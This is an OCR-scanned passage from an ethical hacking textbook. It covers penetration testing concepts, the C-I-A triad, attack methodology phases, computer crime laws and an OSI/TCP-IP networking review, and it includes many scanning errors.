simulated to determine what would happen to an organization if an actual attack had occurred. NOTE In today’s environment, those wishing to become ethical hackers have many options that were unavailable before. They can pursue certification classes and participate in boot camps as part of a diverse development course to hone their skills. Always remember that the main characteristic that separates black hats from white hats is compliance with the law. 1 CHAPTER 1 Hacking: The Next Generation 13 Penetration tests are also commonly used as part of ei larger effort commonly known as an IT audit, which evaluates the overall effectiveness of the IT systems controls that safeguard the organization. An IT audit is usually conducted against some standard or checklist that covers security protocols, software development, administrative policies, and IT governance. However, passing an IT audit does not mean that the system is completely secure, as audit checklists often trail new attack methods by months or years. The Role of Ethical Hacking An ethical hacker’s role is to take the skills he or she has acquired and use thai knowledge, together with an understanding of the hacker mindset, to simulate a hostile attacker. It often said that to properly and completely defend oneself against an aggressor, you must understand how that aggressor thinks, acts, and reacts .The idea is similar to military training exercises in which elite units are trained in the tactics of a hostile nation in order lo give other units the ability to train and understand the enemy without risking lives. Here a few key points about ethical hacking that are important to the process: It requires the explicit permission of the “victim” before any activity can take place. Participants use the same tactics and strategies as regular hackers. Tt can harm a system if you don’t exercise proper care. It requires detailed advance knowledge of the actual techniques a regular hacker will use. It requires that rules of engagement or guidelines be established prior to any testing. NOTE Ethical hackers can be employed to test a specific feature of a group of systems, or even trie security of a whole organization. It depends on the specific needs of a given organization. In fact, some organizations keep people on staff specifically to engage in ethical hacking activities. TO Under the right circumstances and with proper planning and goals, ethical hacking or penetration testing can provide a wealth of valuable information to the target organi- zation (“client”) about security issues that need addressing. The client should take these results, prioritize them, and take appropriate action to improve security. Effective security must still allow the system to provide the functionality and features needed for business to continue. However, a client may choose not to take action for a variety of reasons. In some cases, problems uncovered may be considered minor or low risk and left as is. If the problems uncovered require action, the challenge is to ensure that if security controls are modified or new ones put in place, existing usability is not decreased. Security and convenience are often in conflict with one another — the more secure a system becomes, the less convenient it tends to be (Figure 1-1). A great example of this concept is to look at authentication mechanisms. As a system moves from passwords to smart cards to biometrics, it becomes more secure — but at the same time users may have to take longer to authenticEite. which may cause some dlsgruntlement. 14 PART 1 Hacker Techniques and Tools Usability versus security, Ease of Use From the theoretical side, ethical hackers Eire tasked with evaluating the overall state of something known as the C-I-A triad, which represents one of the core principles of security: to preserve confidentiality, integrity, and availability; • Confidentiality — Safeguarding information or services against disclosure to unauthorized parties. • Integrity — Ensuring that information is in its intended formal or state: in other words, ensuring that data in not altered. • Availability — Ensuring that information or a service can be accessed or used whenever requested . Some professionals refer to this as the A-I-C triad. Another way of looking at the balance is to observe the other side of the triad and how the balance is lost. The C-I-A triad is lost if any or all of the following occu rs: • Disclosure — Information is accessed in some manner by an unauthorized party. Alteration — Information is maliciously or accidentally modified in some manner. • Disruption — Information and/or services are not accessible or usable when called upon. An ethical hacker is tasked with ensuring that the C-I-A triad is preserved and threats are dealt with adequately (as required by the organization’s own rules], For example, consider what could result if a hetiEth-care organization lost control of (or could not provide access to) sensitive information about patients. Such situations typically result in civil and criminal actions. Figure 1-2 shows the C-I-A triad, CHAPTER 1 Hacking: The Next Generation It is important to identify assets, risks., vulnerabilities and threats. In the ethical hacking and security process, not all assets are created equal and do not have equal value for an organization. By definition, assets possess some value to a given organization. Asset owners evaluate each asset U> del ermine how important it is relative to other assets and to the company as a whole, Next, the ethical hacker identifies potential threats and determines the capability of each to cause harm to the assets in question. Once assets and potential threats are identified, the ethical hacker thoroughly and objectively evaluates and documents each asset’s vulnerabilities in order to understand potential weaknesses. Note that a vulnerability exists only It a particular threat can adversely affect an asset Finally, the ethical hacker performs a risk determination for each asset individually and overall to determine the probtibility that a security incident could occur, given the threats and vulnerabilities in question. In a sense, risk is comparable to an individual’s “pain threshold” — different individuals can tolerate different levels of pain. Risk is the same — each organization has its own tolerance of risk, even if the threats and vulnerabilities are the same. A hacking methodology refers to the step-by-step approach an aggressor uses to attack a target such as ei computer netw T ork. There is no one specific step-by-step approach all hackers use. As can be expected when a group operates outside the rules as hackers do, rules do not apply the same way, A major difference between a hacker and an ethical hacker is the code of ethics to which each subscribes. Hacking methodology generally includes the following steps (Figure 1-3): ■ Foot printing — An attEicker passively acquires information about the intended victim’s systems. In this context, passive Information gathering means that no active interaction occurs between the attEicker and the victim (for example, conducting a whois query,) Common Hacking Methodologies The C-l-A triad. Availability 16 PART 1 Hacker Techniques and Tools FIGURE 1-3 hacking steps. Footprint] ng Scanning Enumeration System Hacking Escalation of Privilege Covering Tracks Planting Backdoors “i • Scan ni n g — A n a I t a cker t a kes the in It ) r m a lion o bta i n t? d during t h e foo I pr in I i n g p h a s l 1 and uses it to actively acquire more detailed information about a victim . For example, an attacker might conduct a ping sweep of all the victim’s known IP addresses to see which machines respond, Enumeration — An attacker extracts more-detailed and useful information from a victim’s system. Results of this step can include a list of user names, groups, applications, banner settings, auditing information, and other similar information, • System hacking — An attacker actively attacks a system using a method the attacker deems useful Escalation of privilege — If this step is successful, an attacker obtains privileges on a given system higher than should be permissible. Under the right conditions, an attacker can use privilege escalation to move from a low-level account such as a guest account all the way up to administrator or system -level access, • Covering tracks — In most cases, an attacker tries to avoid detection, and so will cover his or her tracks by purging information from the system to destroy evidence of a crime. Planting backdoors — Depending on goals, an attacker may leave behind a backdoor on the system for later use. Backdoors can be used to regain access, as well as allow any number of different scenarios to take place, such as privilege escalations or remotely controlling a system. CHAPTER 1 Hacking: The Next Gen e ration 17 Performing a Penetration Test A penetration test is the next logical step beyond ethical hacking. Although ethical hacking sometimes occurs, without format rules of engagement, penetration testing does require rules to be agreed upon in advance. If an ethical hacker chooses to perform a penetration test without having certain parameters determined ahead of time, it can lead to a wide range of unpleasant outcomes. For example, not having the ru les established prior to engaging in a test could result in criminal or civil charges, depending on the injured party and the attack involved. It is also entirely possible that without clearly defined rules, an attack may result in shutting down systems or services and completely stopping a company’s operations. National Institute of Standards and Technology Publication 800-42 (NIST 800-42), Guideline on Network Security Tenting, describes penetration testing as a four-step process, as shown in Figure 1-4. When the organization decides to carry out a penetration test, the ethical hacker should post certain questions to establish goals. During this phase, the aim should be to clearly determine why a penetration test and its associated tasks are necessary These questions include the following: • Why is a penetration test deemed necessary? • What is the function or mission of the organization to be tested? • What will be the limits or rules of engagement for the test? • What data and services wilt the test include? • Who is the data owner? • What results are expected at the conclusion of the test? • What will be done with the results when presented? • What is the budget? • What are the expected costs? ■ What resources will be made available? • What actions will be allowed as part of the test? • When will the tests be performed? Additional Discovery FIGURE 1-4 Ethical hacking steps. Planning Discovery Attack ^ Reporting <4 18 PART 1 I Hacker Techniques and Tools • Will insiders be notified? • Will the test be performed as b I tick or white box? • What conditions will determine the tesf s success? • Who will be the emergency contacts? Penetration testing can take several forms, The ethical hacker must decide, along with the client, which tests Eire appropriate and will yield the results the clients seek. Tests that can be part of a penetration test include the following: • Insider attack — This is designed to simulate the actions that a disgruntled employee or other individuals who have authorized access to a system may undertake. • Outsider attack — This is designed to closely match an outside aggressor’s attack against an organization. • Stolen equipment attack — This is designed to attack an organization’s physical security. Actions of this type include breaking into server rooms, bypassing locks, and other similar activities. • Social engineering attack — In this type of attack, the target is the human being, not the technology itself. If skillfully done, the attacker can obtain information or access that the attacker would not otherwise have. The attack exploits the inherent trust and habit in human nature. Once the organization and the ethical hacker have discussed each test, determined its suitability, and evaluated its potential advantages and side effects, they can linalize the planning and contracts and perform the testing (Figure 1-5). When performing a penetration test, the team should generally include members with different but complementary skills. When the rules of the test have been determined, the team is selected based on the intended tests it will perform and goals it will address. Expect a team to include diverse skill sets, including detailed knowledge of routers and routing protocols. Additional skills that prove useful are those that deal with the operation and configuration of firewalls and the operation of ID Sand IPS systems. Team members should also share some skills, such as knowledge of networking. Transmission Control Protocol/ Internet Protocol (TCP/IP), and similar technologies. Reassessment Assessment FIGURE 1-5 Ethical hacking test steps. Post Assessment CHAPTER 1 Hacking: The Next Generation 19 When employees are riot provided information about a pending or an in- progress test, they are more likely to respond as if a real attack were occurring. This is an excellent way to check if training results in changed behavior. For example, if employees do not challenge strangers conducting a penetration test, they are unlikely to challenge a real intruder. Another important aspect of the test is whether will hove Einy knowledge that the test is being performed. In some cases, having employees unaware of the test will yield valuable insight into how they respond to incident(s). This allows for evaluation of current training. Frameworks for the penetration test may include K 1ST 800-42 and 800-5 3. The Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE), or the Open Source Security Testing Methodology Manual (OSSTMM’Il The OSSTMM is very popular because it is an open source, peer-reviewed methodology for performing security tests and metrics. NOTE NI5T Special Publication (SP) 800-53A, Guide for Assessing Security Controls in Federal information Systems and Organizations, specifically requires penetration testing and requires that ethical hackers exploit vulnerabilities and demonstrate the effectiveness of in-place security controls. The Role of the Law and Ethical Standards When an ethical hacker engages in any hacking-related activity, it is absolutely essential that he or she know all applicable laws or .seek assistance to determine what the laws may be. Never forget that due to the nature of the Internet and computer crime, it is entirely possihle for any given crime to stretch over several jurisdictions, potentially frustrating any attempts to prosecute it. Additionally, prosecution can be stymied by the legal systems in different countries in which a mix of religious, military, criminat, and civil laws exist Successful prosecution requires knowledge of the legal system in question. Ethical hackers should exercise proper care not to violate the rules of engagement, because doing so can have repercussions. Once a client has determined what the goals and limitations of a test will he and contracted with the ethical hacker, the ethical hacker must carefully adhere to the guidelines. Remember two very important points when considering breaking guidelines: • Trust — The client is placing trust in the ethical hacker to use the proper discretion when performing a lest. W an ethical hacker breaks this trust, it can leEid to the questioning of other details, such as the results of the test. • Legal implications — Breaking a limit placed upon a test may be sufficient cause for a client to lake legal action against the ethical hacker, PART 1 Hacker Techniques and Tools The following is a summary of Ieiws. regulations, and directives that an ethical hacker should have a basic knowledge of: • 1973 U.S. Code of Fair Information Practices governs the maintenance and storage of personal information by data systems such as health and credit bureaus. • 1974 IIS. Privacy Act governs the handling of personal information hy the IIS. government, • 1984 U.S. Medical Computer Crime Act addresses illegally accessing or altering medication data. • 1986 (Amended in 1996) U.S. Computer Fraud and Abuse Act includes issues such as altering, damaging, or destroying information in a federal computer and trafficking in computer passwords if it affects interstate or foreign commerce or permits unauthorized access to government computers. • 198 6 U.S. Electronic Communications Privacy Act prohibits eavesdropping • or the interception of message contents without distinguishing between private or public systems. • 1994 U.S. Communications Assistance for Law Enforcement Act requires all communications carriers to make wiretaps possible. • 1996 U.S. Ke n n edy-K a sseh a u m Health Insurance and Portability Accountability Act (I1IPAA) (with additional requirements added in December of 2000) addresses the issues of personal health care information privacy and health-plan portability in the United States, • 1996 U.S. National Information Infrastructure Protection Act — enacted in October of 1996 as part of Public Law 104-294 — amended the Computer Fraud and Abuse Act, which is codified in 18 II.S.C. § 1030. This act addresses the protection of the confidentiality, integrity, and availability of data and systems. This act is intended to encourage other countries to adopt a similar framework, ill us creating a more uniform approach i> addressing computer crime in Liu- existing global information infrastructure. • 2002 Sarbanes-Oxley Act (SOX) is a corporate governance law that affects public corporations’ financial reporting. Under SOX, corporations must certify the accuracy and integrity of their financial reporting and accounting. • 2002 Federal Information Security Management Act fFISMA) requires every U.S. federal agency to create and implement an in tor mat ion security program • to protect the information and information systems that agency uses. This act also requires agencies to conduct annual reviews of their information security program and submit results to the Office of Management and Budget (OMB), CHAPTER 1 Hacking: The Next Gen e ration CHAPTER SUMMARY This chapter addressed ethical hacking and its value to the security professional. Ethical hackers are Individuals who possess skills comparable to regular hackers, but ethical hackers engage in their activities only with permission. Ethical hackers attempt to use the same skills, mindset, and motivation as a hacker in order to simulate an attack by an actual hacker while at the same time allowing for the test to be more closely controlled and monitored. Kihicul 1 nickers are professionals who work within the confines of a set of rules of engagement that are never exceeded lest they llnd themselves facing potential legal action. Conversely, regular hackers may not follow the same ethics and limitations of ethical hackers. Regular hackers may work without ethical limitations, and the results they can achieve are restricted only by the means, motives, and opportunities that are made available. Finally, hacking that is not performed under contract is considered illegal and is treated as such. By its very nature, hacking activities can easily cross state and national borders into multiple legal jurisdictions. KEY CONCEPTS AND TERMS Asset Authentication Block-box testing Cracker Denial of service (DoS) Distributed denial of service Ethical hacker Trojan horse Vulnerability White-box testing! Exploit Hacker (DDoS) Dumpster diving 22 PART 1 Hacker Techniques and Tools CHAPTER 1 ASSESSMENT 1 . Which of the following represents a valid ethical hai kiiLiJ l us I melhodoloiiv.” A. HI FA A B, RFC 10K7 G OSSTMM II TCSEC 1. It Is most Important to obtain before beginning a penetration test. I. A Maturity exposure in an operating system or application software component is called a . 1. The second step of the hacking process Is , • When hackers talk about standards of behavior and moral issues of right and wrong, what • are they rdcrring u>: A, Rules 11. Standards G Laws II Ethics 1. Hackers may justify their actions based on which of the following; A. All information should be free B, Access to computers and their data should be unlimited C Writing viruses, malware, or other code is not a crime D. Any of the above 1. This Individual responsible for releasing what is considered to be the first Interne! worm was: A. Kevin Mltnick B. Robert Morris, Jn C. Adrian Lamo 11 Kevin FouJsen S. A liHukcr w illi compuUiLe-. skills and expertise to Launch harmful attacks on computer networks iiud uses 1 1 lose skills Illegally is best described as a(n): A. Disgruntled employee B. Ethical hacker C. White hat hacker 11 Black hat hacker 1. If a penetration test team does not have anything more than a list of IF addresses of the organization’s network, what type of test are the penetration testers conducting? A. Blind assessment B. While box G tlray box II Black box 1. How is the practice of tricking employees into revealing sensitive data about their computer system or infrastructure best described? A. Ethical hacking B. Dictionary attack G Trojan horse 11 Social engineering CHAPTER TCP/IP Review YOU MUST POSSESS a number of skills to conduct a successful and complete penetration test. Among the skills that are critical is an understanding of Transmission Control Protocol/Internet Protocol (TCP/IP) and Its components, Because the Internet and most major networks employ the IP protocol, an understanding of the suite becomes necessary. The IP protocol has become the most widely deployed and utilized networking protocol because of the power and flexibility it offers. The IP protocol has been used in larger deployments and more diverse environments than were ever envisioned by the protocol designers. Although the IP protocol is flexible and scalable, it was not designed to be secure. Prior to any discussion of TCP/IP, it Is important to understand a model that is commonly known as Open Systems Interconnection (OSI). The OS I reference model was originally conceived as a mechanism for facilitating consistent communication and interoperability between networked systems. This chapter rakes a km at the ; jrdaTien:a; concepts, Lech no oq es. and other items related to networking. Included in this chapter is a closer examination of the TCP/IP networking protocol and its components. This look at the TCP/IP protocol helps you perform tests later on and provides a valuable foundation for understanding various security vulnerabilities and a; tacks. Chapter 2 Topics This chapter covers the following topics and concepts: What the OSI reference model is What the TCP/IP layers are 23 Chapter 2 Goals When you complete this chapter, you will be able to: • Summarize the OSI reference model and TCP/IP model • Describe the OSI reference model • Describe the TCP/IP layers • List the primary protocols of TCP/IP, including IP, Internet Control Message Protocol (ICMP), TCP, and User Datagram Protocol (UDP) • Select programs found at the application layer of the TCP/IP model • Describe TCP functions and the importance of flags as related to activities such as scanning • List reasons why UDP is harder to scan for than TCP • Identify how ICMP is used and define common ICMP types and codes • Review the role of IP and its role in networking • Describe physical frame types • Detail the components of Ethernet • List the purpose and structure of Media Access Control (MAC) addresses • State the operation of carrier sense multiple access/collision detection (CSMA/CD) • Compare and contrast mutable and routing protocols • Describe link state routing protocols and their vulnerabilities • Describe distance routing protocols and their vulnerabilities • Describe the function of protocol analyzers (sniffers) • Explain the components of a sniffer application • List common TCP/IP attacks • Define denial of service (DoS) • List common distributed denial of service (DDoS) attacks • Define a SYN flood • Explain the function of a botnet • CHAPTER 2 TCP/IP Review 25 Exploring the OSI Reference Model This section explores the Open Systems Interconnection (OSI ) reference model. In 197a the Open Systems Interconnection Committee was created with the goal of creating a new communication .standard for networking. Based on a number of proposals, the OSI reference model was developed and is still used today. The OSI reference model is used mainly in today’s networking environment a.s both a reference model and an effective means of teaching distributed communication. OST functions in a predictable and structured fashion designed to ensure compatibility and reliability. If you examine the OSI reference model, you quickly notice that it is made up of seven complementary but distinctly different layers, each tasked with carrying out a discrete group of operations. From the top down, these seven layers are the application, presen- tation, session, transport, network, data link, and physical layers. These layers are also referred to by number (seven is the application layer, andoneisthe physical layer.) The OSI reference model is also implemented in two areas: hardware and software. The bottom two layers are implemented in hardware, and the top live are implemented through software. The layers of the OSI reference model are shown in Figure 2- 1 , The OSI reference model is not a law or rule; it is a recommendation that manufacturers of hardware and software can choose to adhere to or not. Although there is no penalty for not following OSI r vendors risk introducing compatibility problems if their product deviates too far from the model. The Role of Protocols In the world of networking, the term “protocol” is sometimes misused. Protocols Eire a set of agreed-upon rules through which communication takes place. Protocols can be thought of in the same way as rules for communicating in a given language — certain words and phrases are understood to convey meaning such as “hello” and “goodbye. 1 ‘ Through the use of protocols, dissimilar systems can communicate quickly, easily, and efficiently without any confusion. Ensuring that a standard is in place and every system OSI Reference Model Application Presentation Session Transport Network Data Link Physical FIGURE 2-1 OSI reference model layers. Logical Link Control (LLC) Media Access Control {MAC) 26 PA RT 1 H ac ke r Techn iq u cs a \ 1 d Too I s or service uses it makes for almost guaranteed interoperability. For example, think of the problems that would arise if the electrical outlets that home appliances are plugged into were all different shapes and sizes. You could never be sure whether the product would work, Rules are established in the OSI reference model through specific orders and hierarchies, best represented by the use of layers. Each of the seven layers performs a given purpose by receiving data from the layer above or below it and then sending the results on to the next appropriate layer after processing takes place. These, seven layers can also be thought of as individual modules with manufacturers of hardware or software writing their respective products with a specific layer or purpose in mind. .Such modularity allows for much easier design and management of networking technologies for all parties involved. NOTE When you look at the inter action between layers in the OSI reference model, note that moving from Layer 1 to Layer 7 shows more “intelligence.” As you get closer to Layer 7 and move further away from Layer 1, the network components have more “understanding™ of the information being handled. Layer 1: Physical Layer At the bottom of the hierarchy of layers in the OS! reference model is the physical layer, also known as Layer 1. This lowest layer defines the electrical and mechanical requirements used to transmit information to and from systems across a given transmission medium (such as cable, fiber, or radio waves). This physical layer deals only with electrical and mechanical characteristics. Examining I he phy sical layer will reveal “‘how much” and “how long” information is sent, but wilt not reveal any unders landing of the information being transmitted. Physical layer characteristics include the following: • Voltage levels • Data rates • Maximum transmission distances • Timing of voltage changes • Physical connectors and adaptors • Topology or physical layout of the network • The physical layer also dictates how the information is to he sent. For example, it specifies digital or analog signaling methods, base or broadband, and synchronous or asynchronous transmission. Consider for a momeul the types of attacks that could occur at the physical layer, particularly that of an individual getting direct access to transmission media. At the physical layer, the potential for an attack exists in many forms, including someone gaining, direct access to physical media, connectivity hardware, computers, or other hardware, Additionally, an attacker accessing the physical layer can place devices on the network that can then be used to capture and/or analyze network traffic. A security engineer should remember these issues and take steps lo secure physical devices and network media and, if possible, encrypt network traffic as needed to prevent u n a u t h or ized d isc lo su re . CHAPTER 2 TCP/IP Review 27 The media access control (MAC) address is also sometimes known as the physical address of a system. This address is provided by hardware, typically in the network card itself, and it is embedded into the hardware at the time of manufacture. In most cases, this address will be unique, but as with most things in security, this isn’t guaranteed in all cases (as will be investigated later on). A MAC address is a 6- byte (48- bit) address used to uniquely identify each device on the local network. Layer 2: Data Link Layer One step above the physical layer is Layer 2, also known as the data link layer. As the in for niation moves up from the physical layer to the data link layer, tin- Lihilily to handle physical addresses, framing, and error handling and messaging are added. The data link layer adds the ability to provide the initial framing, formatting, and general organization of data prior to handing it off to the physical layer for transmission. More important, the data link layer includes two items that will he important later on: logical link control (LLC) and media access control (MAC). To understand the actions and activities that occur at the data link layer, one of the structures that must be understood is a frame. A frame can be visualized as a container that the data to be transmitted can be placed into for delivery. Through the use of framing, which is set by the network itself, a standard format for sending and receiving data Is established, allowing for mutual understanding of the data being handled. The sending station packages the information into frames, and the receiving station unpacks the information from the frames and moves it along to the next layer for further processing. The frame is a vital structure because it dictates just how a network works at a fundamental level. There are many types of frames that can be discussed, but the most common type of network and the frames that come with it is Ethernet. Ethernet, also known as Institute of Electrical and Electronics Engineers (IEEE) 802,3, is used by the majority of data networks. Another important function of the data link is flow control, which is the mechanism that performs data management. Flow control is responsible for ensuring that what is being sent does not overwhelm or exceed the capabilities of a en physical connection, if lUnv control ibd nol exist, it might be possible under the right conditions to overwhelm a connection with enough traffic to cause an attack similar to a denial of service (DoS) attack. NOTE Frame types are specific to a network and cannot be understood by a different network type because the frames would be incompatible. Although Ethernet is the most common type of network, other common networks include Token Ring (IEEE 802,5) and wireless (IEEE 302.11), each with its own unique and incompatible frame type. 28 PART 1 Hacker Techniques and Tools The data link layer has a mechanism known as the Address Resolution Protocol (ARP). which is responsible for translating IP addresses to a previously unknown MAC address, uSecitrily is not something that the II 1 protocol does well H and the ARP Is a great example, This feature does not include any ability to authenticate the systems that use it. Layer 3: Network Layer Layer 3 (the network layer) is the entity that handles the logical Eid dressing and routing of traffic. One of the most visible items that appear at this layer is the well-known IP address present in the IP protocol. IP addresses represent what is known as logical addresses, which are nonpersistent addresses assigned via software that are changed as needed or dictated by the network. Logical addresses are used to route traffic as well as assist in the division of a network into logical segments. To get an idea of what a logical network looks like, take a moment to review a network subdivided by different IP subnets, zis shown in Rgure 2-2. At the network layer, security needs to be considered because manipulation of information can occur at this level. NOTE The network Jayer is the first of the layers within OSI that are implemented in software. Starting at Layer 3 and moving up to Layer 7, each layer is now implemented withtn the software being used, specifically the operating system. Layer 4: Transport Layer Just above the network layer is the transport layer (Layer 4}. The transport layer provides a valuable service In network communication: the ability to ensure that data is sent completely and correctly through the use of error recovery and flow control techniques. On the surface, the transport layer and its function might seem similar to the delta link layer because it also ensures reliability of communication. Howei r er. the transport layer not only guarantees the link between stations: it also guarantees the actual delivery of data. CHAPTER 2 KfVIP Review 29 Connection Versus Connectionless At the transport layer are the two protocols known as TCP and UDP; these protocols are known as connection and connectionless respectively. Connect ion -oriented protocols operate by acknowledging or confirming every connection requestor transmission, much like getting a return receipt for a letter. Connectionless protocols are those that do not require an acknowledgement and in Tact do not ask for nor get one. The difference between these two is the overhead that is involved. Due to connection -oriented protocol’s need for acknowledgements, the overhead is more and the performance is less, while connectionless is faster due to its lack of this requirement. From a high-level perspective, the transport layer is responsible for communication between host computers and verifying that both the sender and receiver are ready to initiate the data transfer. The two most widely known protocols found at the transport layer are Transmission Control Protocol (TCP) and User Datagram Protocol (UDP). TCP is connection- oriented, whereas UDP is connectionless. TCP provides reliable communication through the use of handshaking, acknowledgments, error detection, and session teardown. UDP is a connectionless protocol that offers speed and low overhead as its primary advantage. Layer 5: Session Layer Above the transport layer is the session layer (Layer 5)i which is responsible for the creation, termination, and management of a given connection. When a connection is required between two points using I he TCP protocol, the session layer takes the responsibility for making sure that creation and destruction of the connection occurs properly. Session layer protocols include items such as Remote Procedure Calls (RPCs) and Structured Query Language (SQL). ^^^^^^^^^^^^^^ Layer 6: Presentation Layer At the presentation layer (Layer 6), data is put into a format that programs residing at the application layer can understand. Prior to arriving at Layer b> information is not in a format that appli- cation layer programs will be able to process fully and therefore must be put into a format that can be understood. Specific examples of services that are present at the presentation layer include gateway services. Gatew r ay services allow for sending or transmission of data between different points that possess different characteristics that would otherwise make them incompatible. The session layer also manages data compression so that the actual number of bits that must be transmitted on the network can be reduced. Other vital services at the presentation layer are encryption and decryption services. From a security perspective, encryption is important because it provides the ability to keep information confidential. NOTE Examples of these formats include American Standard Code for Information Interchange (ASCII) and Extended Binary Coded Decimal Interchange Code (EBCDIC). 30 PARTI Hacker Techniques and Tools Be sure that when thinking of the name “application layer,” you take care not to think of software applications. Software applications are those items that a jser of a system interacts with directly, such as e-mail applications and Web browsers. The application layer is the point at which software applications access network services as needed. Think of the software applications as a microwave oven in your home and the application layer as the electrical outlet that the microwave plugs into to get power. Layer 7: Application Layer Clipping off I he OS I reft’ re nee model is the application layer (Layer 7) – The application layer hosts several tip plication services that are used by applications and other services running on the system. For example, Web browsers that would be classified as a user-level explication run on a system and access the network by “plugging 1 * into the services at this layer to use the network. This layer includes network mon itoring, management, file sharing. RPC, and other services used by applications, The application layer is one that most users are familiar with because it is the home of e-mail programs, rile transfer protocol (FTP), Telnet, Web browsers, office productivity suites, and many other applications, It is also the home of many malicious programs such as viruses, worms, Trojan horse programs, and other malevolent applications. The Role of Encapsulation In the OS I framework, the concept of encapsulation is the process of “packaging” infor- mation prior to transmitting it from one location to another. When transmitted across the network, it moves down from the application layer to the physical layer and then through the physical medium. As the delta moves from the Explication layer down, the information is packaged and manipulated along the way until it becomes a collection of bits that race down the wire to the receiving station, where the process is reversed as the data moves back up the model. Data Application Encapsulation, UDP Header UDP Data Transport IP Header IP Data Internet Frame Header Frame Data Frame Footer Link CHAPTER 2 TCP/IP Review 31 Application Presentation Session Transport Network Data Link Physical Application attacks, buffer overflows, exploit code, malicious software, e,g,, viruses, worms, and Trojans NetBIOS enumeration, clear text extraction, and protocot attack Session hijacking. SYN attacks, and password attacks Port scanning, DOS attacks, service enumeration and flag manipulation IP attacks, routing attacks, AfiP poisoning, MAC flooding and I CMP assaults such as Smurf Passive and active sniffing, MAC spoofing, and WEP cracking Hardware hacking, lock picking, physical access attacks, wiretapping and interception FIGURE 2-4 Attack layers and the 051 reference model Mapping the OSI to Functions and Protocols Although this chapter is meEint to serve only iis a primer or introduction to the OSI reference model and TCP/IP protocol, and the concepts introduced here will be explored in depth lat er, it still is important to understand some details now. Note that later on in this text several attacks will be discussed. Figure 2-4 will help to provide context for that kiter discussion. OSI Layers and Services Although TCP/IP is the dominant networking model, the OSI reference model remains important. It has served as an invaluable tool or reference model that can be used to map the location of various services. Table 2-1 illustrates each layer of the OST reference model and some of the various services found at each layer. The OSI reference model protocols at the implication layer handle Hie transfer, virtual terminals, and network management, and fulfill networking requests of applications. A few of the protocols are shown in Table 2- 1 . table 2-1 OSI layers anc I common protocols. OSI REFERENCE MODEL LAYER COM MOW PROTOCOLS AND APPLICATIONS Application FTP, TFTP, SNMP, Telnet, HTTP, DNS, and POP3 Presentation ASCII, EBCDIC, TIFF, JPEG, MPEG, and MIDI Session NetBIOS, SQL, RPC, and NFS Transport TCP, UDR SSL, and SPX Network IP, ICMR IGMP, BGP, OSPF, and IPX Data Link ARP, RARP, PPP, SLIP, TLS r L2TP, and LTTP Physical HSSI, X.21, and EIA/TiA-232 32 PART 1 Hacker Techniques and Tools TCP/IP is not a new protocol; in fact, the protocol has its genesis back in the early 1970s with the Defense Advanced Research Projects Agency (DARPA). TCP/IP was designed to be part of a network structure that would be flexible and resilient enough to lower the risk of failure. The protocol has proven to be a very flexible and we 1 1 -designed protocol. Although version 4 (IPv4) is by far the most used version, use of IPv6 is starting to increase. However, for all the advantages that the IP protocol has r one thing it does not do well is security. The original architects of the protocol never foresaw the security issues that are present today. TCP/IP (a Layer-by-Layer Review) Having explored the OSI reference model and looked at examples of each Jayer H let’s turn our attention to TCP/IP. It is important to envision TCP/IP as a suite of protocols that controls the way information travels from location to location, and to realize early on that TCP/IP is a collection of protocols lhat perform a wide array ol” funelions. This is the reason why TCP/IP is known more accurately as the TCP/IP protocol suite. When individuals refer to the TCP/IP protocol they are generally referring to the IP role of the suite,, which is the one responsible for addressing and routing information. Out of the fairly targe suite of TCP/IP protocols there are four protocols that generally serve as the foundation of the TCP/IP suite: IP. TCP, I IDE and ICMP These protocols are so vital to normal network functioning that no device will exist on a TCP/IP network without supporting ail of them. Each of the four main protocols provides some vital service or purpose that will be explored later in this text. It is possible to tie in at least a few of the items that nave been mentioned so far {such as encapsulation) because each of these protocols in some way prepares the data to be moved on the network as it leaves Layer 7 and moves down. An example of the TCP/IP slack can be seen in figure 2-5. FIGURE 2-5 A comparison of TCP/IP and the OSI reference modeL s Application 6 Presentation 5 r Session Transport 3 w ^ Network k 2 Data Link L Physical Application OSI Reference Model Physical TCP/IP Model CHAPTER 2 TCP/IP Review 33 Although TCP/IP is has proven to be a flexible mid robust network protocol, it was i m possible for the designers of the protocol to anticipate every eventuality that could have arisen. A more trusting environment existed when TCP /TP was designed. As such, the protocol lacks significant security capabilities. In tact, several components of TCP/IP are insecure. Ah hough J Pvft is quickly emerging as the replacement for IPv4 and will include security measures designed to address the problems, it is far from being In widespread usage. Pay special attention to the security concerns associated with each layer and its s pre l lie protocols. The four layers of TCP/IP include the following: • Application layer • Host-to-host layer • Internet layer • Network access layer • Physical/Network Access Layer The physical /network access layer, which resides at the lowest layer of the TCP/IP model, is the point at which the higher-layer protocols interface with the network transport media. When comparing to the OSI reference model, this layer corresponds to OS I Layers 1 and 2. Physical/Network Equipment Physical/network equipment located at this layer of the TCP/IP model usually includes the following devices: Repeaters — A device that amplifies, reshtipes. or regenerates signals during retransmission. Typically these devices are used when long distances need to be covered and the distance exceeds the supported length of the medium. ■ Hubs — A hub receives a signal on one port and retransmits it to every other port on the hub. It does not alter the transmission in any way. Although common in networks that were smaller in nature, hubs are not nearly as common today. Hubs possess several ports. ■ Bridges — Whereas hubs receive a signal on one port and retransmit it to every other port indiscriminately, a bridge does not do so. Bridges direct information based on MAC addresses and as such can control the flow of traffic much better than hubs can. These devices only send information to ports that actually are the intended recipients of the information. They initially seiw increased popularity due to their ability to overcome problems associated with hubs. • Switches — Devices that add additional intelligence to what already exists in bridges by providing the following: • Extremely low latency • Switches can operate in half duplex or full duplex modes. • ■ All forwarding decisions are based on a destination MAC address, • Each port is a separate collision domain. 34 PA RT 1 H ac ke r Techn iq ties and Too I s Although low-end consumer switches have limited functionality, more expensive switches that are found in large networks provide greater functionality. These higher-end switches typically provide the following: • A command line interface via Telnet or console port to configure remotely • A brow ser-b ased interface fo r con li gurat io n • All switches work in similar ways with vendors adding additional value-added features to make their product easier than, or different from, a competitor’s. Even with this functionality, all devices connected to a switch are thought to he part of the same broadcast domain: that is> each port on a switch is a separate collision domain. A broadcast frame sent by any particular device on a switch is automatically forwarded to all other devices connected to the switch. Physical/ Network Layer Protocols Protocols found at this layer include ARP, Reverse Address Resolution Protocol (RARP), Transport Layer Security (TLS). Layer 2 Tunneling Protocol (L2TP), LTTP Point -to- Point Protocol (PPP), and Serial Line Interface Protocol (SLIP), One of the most important services is ARP. ARP’s role is to provide the ability to resolve IP Eid dresses to an unknown MAC address, ARP works by using a two-step process to perform resolution. First, it uses a broadcast requesting a physical address from a target. Each device processes the request* and if the station with the address requested is reached, it responds with its physical or MAC address. Requests that are returned are cached on the local system for later reference if needed. The ARP cache on a system can be viewed at any time by using 